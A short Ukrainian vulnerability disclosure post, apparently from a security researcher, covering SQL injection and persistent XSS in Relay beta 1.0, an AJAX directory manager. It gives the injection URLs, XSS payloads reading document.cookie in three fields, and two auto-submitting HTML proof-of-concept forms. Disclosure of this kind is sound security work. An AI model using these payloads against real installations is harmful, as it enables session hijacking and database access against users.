Уразливості в Relay
20:25 20.01.200829.10.2007
У травні, 26.05.2007, я знайшов SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).
Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам веб додатка.
20.01.2008
SQL Injection:
http://site/relay/relay.php?relay=getFile&fileid=-1%20or%20id=1151513788
http://site/relay/relay.php?relay=getFile&fileid=1151513788%20and%20substring(version(),1,1)=3
XSS (Persistent):
На сторінці http://site/relay/relay.html
<img src='' onerror='javascript:alert(document.cookie)'>
В полі: name.
PoC:
relay XSS.html
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg<img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="description" value="">
<input type="hidden" name="flags" value="normal">
</form>
</body>
На сторінці http://site/relay/relay.html
</textarea><img src='' onerror='javascript:alert(document.cookie)'>
В полі: description.
PoC:
relay XSS2.html
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg">
<input type="hidden" name="description" value="</textarea><img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="flags" value="normal">
</form>
</body>
XSS:
На сторінці http://site/relay/relay.html
<img src='' onerror='javascript:alert(document.cookie)'>
В полі: searchbar.
Вразлива версія Relay beta 1.0. Для виконання SQL Injection необхідно мати акаунт в системі (будь-то акаунт адміна чи користувача). А XSS уразливості можуть бути використані проти усіх користувачів системи.